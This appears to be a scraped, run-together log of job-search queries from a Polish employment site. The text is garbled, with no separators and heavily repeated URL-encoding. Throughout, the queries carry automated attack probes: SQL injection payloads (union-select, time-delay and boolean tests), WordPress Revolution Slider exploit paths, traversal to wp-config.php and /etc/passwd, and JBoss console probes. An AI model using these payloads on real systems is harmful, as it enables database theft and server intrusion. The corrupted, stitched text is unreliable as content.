cproduct photographypraca+bez+znajomo%2525252525c5%25252525259bci+j%2525252525c4%25252525259stolarz niemcyin%c5%bcynier budowy/wp-login.php and 1>1orzeszemanager sprzedaży gdyniaoperator wózków widłowychpracownik hali %2c supersamypraca+fizyczna+sprzątaczka gdańsktechnolog przetw%25c3%25b3rstwa tworzywtransport %2525257c spedycjapraca w piekarnipomoc księgowakontrola jakościpracownik podkarpackiefinanse%25252b%25257c%25252bbankowo%2525c5%25259b%2525c4%252587emerytka szczecin pomorzanypracownik%2bfizyczny niemcyspecjalista%2bds.%2bszkole%2525252525c5%252525252584transport | spedycja' and 'x'='yadministracja+biurowa nasielskpomocnik%2b%2bw%2b%2b%2bgospodarstwie%2b%2brolnymprodukcja dla niepełnosprawnych union all select null,null,null,null,null,null,null,null,null,null#procurements+specialist-1260+union+all+select+14,14,14,14,14,concat(concat('qqzpq','gacbylpufr'),'qbbvq'),14--+kpixpraca zdalna - wprowadzanie danychspawacz aluminiumzakupy dolnośląskieprodukcja+dla++niepełnosprawnych+union+all+select+null,null,nullelmodiszdalna+jezyk+francuskimonter konstrukcji/wp-login.php%25252527a%2525253d0/wp-admin/wp-admin/admin-ajax.php%2525253faction%2525253drevslider_show_imageenergetyka+%25257c+elektronika niemcymagazynier/operator%2bw%25c3%25b3zka%2bwid%25c5%2582owego%2b%2528m/k%2529pracownik produkcji %252528m/k%252529praca fizyczna w rolnictwie poznańpracownik+produkcyjny+%28m/k%29pracownik produkcji – nie wymagamy doświadczeniajęzyk+włoski śląskiesoftware engineerlider w dziale produkt%2525c3%2525b3w du%2525c5%2525bcej konsumpcjims officepracownik%25252bmonta%25252525c5%25252525bcunauczyciel j%25c4%2599zyka angielskiegoobsługa+maszyn wrocławspecjalista+ds+kadr+i+p%25c5%2582ac wielkopolskaprodukcja+dla++niepełnosprawnych+union+all+select+null#transport %7c spedycja' and 'x'='ylogistyk+magazynierŻytnokierowca w wypo%2525252525252525c5%2525252525252525bcyczalni samochodowej %252525252525252528m%2525252fk%252525252525252529 niemcyprzemysł | produkcja zachodniopomorskieosoba sprz%252525c4%25252585taj%252525c4%25252585camonter+konstrukcji/wp-login.php%2527a%253d0/wp-content/plugins/revslider/temp/update_extractmagazynier%2b%2c%2bbudowlankakonsultant ds. obsługi klientain%252525c5%252525bcynier+serwisu mazowieckieprzemys%25c5%2582 %257c produkcja gliwicetransport%252b%257c%252bspedycja%2522%252band%252b%2522x%2522%253d%2522yexcel śląskieze%252b%2525c5%25259brednim%252bwykszta%2525c5%252582ceniemadministracja pa%25c5%2584stwowa warszawapraca+bez+znajomo%2525c5%25259bci+j%2525c4%25259monter konstrukcji/wp-login.php%25252525252527a%2525252525253d0/wp-content/uploads/51217766.phpsprzątaczka w bibliotece polskasprzedawca kasjer szczecinwołówkierownik sprzeda%25c5%25bcypracownik%25252525252bprodukcji-bez-jezyka-niemieckiegopracownik obs%2525c5%252582gi lotniskahuman+resources+%7c+kadry wielkopolskieksięgowy krakówoperator+w%25c3%25b3zka+wid%25c5%2582owego warszawakierrowca+kat+b%252527a%25253d0transport %25257c spedycja and 1%253d1sprzedaż | obsługa klienta siedlcepracownik betoniarzmagazynier%252525252cprodukcja%252525252ckierowca%2bkat.b mazowieckiebez znajomości językakierowca+w+wypo%2525c5%2525bcyczalni+samochodsprzeda%25252525c5%25252525bc %252525257c obs%25252525c5%2525252582uga klienta podkarpackiebadania%252bi%252brozw%252525252525c3%252525252525b3jin%c5%bcynier budowy/wp-login.php and 1=1'and'c'='cpraca bez jezyka magazynspecjalista ds kadr i p%25252525c5%2525252582ackierowca wózka widłowego wrocławpracownik biu poznańnauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam,(select (case when (3417=3417) then 1 else 341doradca+klientads.+szycia+na+miar%25c4%2599 warszawain%c5%bcynieria+%7c+projektowanie polandpraca%25252bbez%25252bznajomo%2525252525252525c5%25252525252525259bci%25252bj%2525252525252525c4%252525252525252599zyka niemcyspecjalista ds. planowania dostawdoradca klienta,transport %25257c spedycja%2527 and %2527x%2527%253d%2527xsprzeda%25c5%25bc %257c obs%25c5%2582uga klienta opolskiepomocnik w gospodarstwie rolnyminternet+%7c+e-commerce szczecinpraca bez znajomo%252525c5%2525259bci j%252525c4%25252599zykpracownik+biurowy+z+językiem+francuskim+-+praca+zdalnapracownik+dzia%25252525c5%2525252582u+w%25252525c4%2525252599dlinymechanik%2bsamochod%c3%b3w%2bci%c4%99%c5%bcarowychkierowca++kat+c warszawalogistyka+|+dystrybucja niemcydoradztwoasystent/ka ds. administracji i obs%c5%82ugi klienta lublinnauczyciel+j%25c4%2599zyk+niemiecki/login.action/web-console/admin-console/'a=0przedstawiciel handlowy małopolskietransport %2525257c spedycja and 1>1 grodzisk mazowieckikierowca+%2525252528m/k%2525252529+%2525252528kat.+c%252525252be%252525252c+hakowce%2525252529brodnicaenergetyka %7c elektronikapraca%252b%252bfizyczna%252bbez%252bj%25252525c4%2525252599zyka niemcyprzemys%2525c5%252582+%25257c+produkcja niemcyszycie w domuspecjalista+ds.+ksi%25c4%2599gowo%25c5%259bcinauczyciel j%25c4%2599zyk niemiecki/login.action/jmx-console/jmx-console/htmladaptor%3faction%3dinspectmbeankonsultant ds. obs%25c5%2582ug klientatechnik%2belektryk%2b%25252525252528m/k%25252525252529kierowca kat b c%27a%3d0kierowca w wypo%25c5%25bcyczalni samochodowej %2528m/k%2529pracownik biura warszawamechanik kłodzkotechnik handlowiecin%2525c5%2525bcynier+budowy/wp-login.php%27+or+%281%2c2%29%3d%28select%2afrom%28select+name_const%28char%28111%2c108%2c111%2c10pracownik+monta%c5%bcu+%28m/k%29 sosnowiecopieka%22%2band%2b%22x%22%3d%22xtechnik+elektryk+%2525252528m/k%2525252529 polskakierowca++kat+c%25%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+dgshlaser opratorelektronik+%252525252528m/k%252525252529+w+zespole+reklamacjisap+abap+mm%d1%80%d1%83%d1%87%d0%bd%d0%b0%d1%8f %d1%80%d0%b0%d0%b1%d0%be%d1%82%d0%b0pracownik+biurowy poznańoperator w%25252525c3%25252525b3zk%25252525c3%25252525b3w wid%25252525c5%2525252582owychbudownictwo%2525252525252b%25252525252525257c%2525252525252bgeodezjawyk%2525c5%252582adanie+towarutechnik%2btechnologii%2b%c5%bcywno%c5%9bcipracownik+inwentaryzacjialuglass - realizacja piotr kalbarczyk") and (select (case when (7646=4392) then null else cast((chr(117)||chr(86)||chr(76)||chrsprzedawca%2c niania%2c operatorka linii produkcyjnejpracownik+działu+obsługi+klientapracownik obszaru produkcji (m/k)mechanik samochodów ciężarowychmonter/ka element%25c3%25b3w do siedze%2elektryk%2b%28m/k%29administracja%2bbiurowaaluglass+-+realizacja+piotr+kalbarczyk")+and+5575=1094+and+("ifmd"="ifmdrolnictwo %25257c ochrona %2525c5%25259brodowiskaaaaaaaaapraca%25252bfizycznz niemcyz j%25c4%2599zykiem w%25c5%2582oskimpracownik%2bprodukcji%2bspo%2525252525c5%2525252525bcywczej%2b%252525252528m/k%252525252529praca bez znajomo%2525252525c5%25252525259bcreferent+ds+kadrtransport%2b%252525252525257c%2bspedycja%2525252525252527a%252525252525253d0%2525252525252527a%252525252525253d0kierowca %28m/k%29 %28kat. c e%2c hakowce%29informatyka+programowanie+helpdesk katowicerussiankonsultant infolinii szpitalnejinspektor+bhpstrzyżowicepraca+dla+osoby+z+orzeczeniem+o+niepełnosprawnościoprator+wózka wrocławpracownik+produkcyjno+-+magazynowypracownik%25252bprodukcyjny%25252b%252528m/k%252529obuwiamonter%2525252fka element%252525c3%252525b3w do siedze%252525c5%25252584 samochodowych niemcykontrola%25252bjako%2525252525c5%25252525259bcimonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1" and "x"="x" or (1,2)=(s-3187 union all select 14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527jbanlhrmpq%2527%2529%252c%2527qbbvq%2527%2529%252c1czerwińsk nad wisłąmonter konstrukcji//wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php%3ffilename%3d../../../../wp-config.phppracownik produkcji - praca dla kobiet i mężczyzn śląskiemagazynier %2528m/k%2529 opolekonsultant telefoniczny ds. sprzeda%2525252525c5%2525252525bcy produkt%2525252525c3%2525252525b3w bankowychimages+background+removal+jobsŁobezmonter%2fka+element%25c3%25b3w+do+siedze%25c5%2584+samochodowych niemcypraca sezonowa śląskiepracownik biurowy na magazynochrona+bonarka krakówmedia+|+sztuka+|+rozrywka warszawapraca%2bdla%2banalityka%2bhta%2b%2528krak%25c3%25b3w%2529energetyka | elektronikapracownik sekretariatupracownik powierzchni sprzedaży krakówpraca biurowa Łódźmotoryzacjana zavodekierowca%252bw%252bwypo%2525c5%2525bcyczalni%252bsamochodowej%252b%252528m%2fk%252529 niemcyprodukcja dla niepełnosprawnych' union all select 13,13,concat(0x7170627871,0x447a644a6d484d776d6b78424a5547766158764c43756c6f6sprzataczka biurowa śląskiealuglass+-+realizacja+piotr+kalbarczyk';declare+@x+char(9);set+@x=0x303a303a332;waitfor+delay+@x--monter/ka element%2525c3%2525b3w do siedkierowca kat c union all select null%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull-- htseksięgowa wielkopolskiemagazynier - nie wymagamy do%25c5%259bwiadczenia%2521nauczyciel j%25c4%2599zyk niemiecki/login.action/web-console/web-console/invokermagazynowy (m/k)monter+instalacji+sanitarnych niemcyspecjalista ds. sprzeda%2525c5%2525bcybudownictwo%252b%2525257c%252bgeodezja francjainżynier warszawapraca+cały+etatinżynier+środowiska poznańindustry | productionasystent biura budowynauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam" and 6041=(select count(*) from sysmaster:sysphydraulik+polskapracownik+produkcyjny+%28m/k%29 gliwicepraca+dla+emeryta,+se warszawapracownik gospodarczy wielkopolskiespecjalista ds. p%2525252525c5%252525252582ac i kadrinżynier+elektrykpraca%2bdla%2bosob%2bniepelnosprawnychspecjalista+ds.+księgowości łódzkiekierowca w wypo%c5%bcyczalni samochodowej %28m%2fk%29 niemcywarehouse/wp-login.php%2527a%253d0specjalista ds. ksi%25c4%2599gowo%25c5%259bci warszawaasystent+działu+zakupówasystentka menedzerapracownik+szklarni+z+og%25252525c3%25252525b3rkamipracownik monitoringu - obiekt handlowymonter%2bkonstrukcji/wp-login.php%2527a%253d0/07545460.php%2band%2b1%253d1doradca techniczny %2525252528komponenty maszyn%2525252529software pro %c5%99%c3%adzen%c3%ad firmy %7c slu%c5%beby google pro firmy %e2%80%93 google%27a%3d0sekretarka ze znajomo%2525c5%25259bci%2525c4%252585przemys%2525c5%252582+%25257c+produkcja mazowieckienauczyciel+języka+niemieckiego wrocławmonter%2fka+element%252525c3%252525b3w+do+siedze%252525c5%25252584+samochodowy niemcymonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.phpprzemys%252525c5%25252582 %2525257c produkcja mazowieckiekoszalinpomocnik+%25c5%259bmieciarzaopieka++osob+starszych krakówpraca w magazynie niemcy bez znajomo%252525c5%2525259bci j%252525c4%25252599zykaoperator%2525252bw%252525252525c3%252525252525b3zk%252525252525c3%252525252525b3w%2525252bwid%252525252525c5%25252525252582owych polskapraca%25252b%25252bfizyczna%25252bbez%25252bj%2525252525c4%252525252599zyka niemcypracownik%252bbudowlanki niemcygdańskmonter/ka+element%c3%b3w+do+siedze%c5%84+samochodowywarehouse/wp-login.php'a=0'a=0location=tychy+and+1>1praca+pomoc+księgowej gdańskpakowacz+bez+języka niemcy/etc/passwd%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+xhcenauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam") and 2837 in (select (char(113)+char(113)+chaspecjalista ds kar i p%25252525c5%2525252582ac wielkopolskiemonter+konstrukcji/wp-login.php%2527a%253d0/07545460.php+and+1%253d1%2527a%253d0%2527a%253d0kierowca kat c%25252527 union all select null%2525252cnull%2525252cnull%2525252cnull%2525252cnull%2525252cnull-- gkmehuman+resources+|+kadry krakówspecjalista ds rozlicze%2525252525c5%252525252584dla obcokrajowc%2525c3%2525b3wkierowca adroperator wózka widłowego krakówlogistyka+%7c+dystrybucja zachodniopomorskiep%c3%b3%c5%82водитель+категории+bjunior front-end warszawakierowca kat c union all select null%2cnull%2cnull-- lyxysprzedaż+|+obsługa+klienta wałbrzychin%c5%bcynieria %7c projektowaniekierowca++kat+c+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27wmsiqvjkatqiwnbivqicnqvwz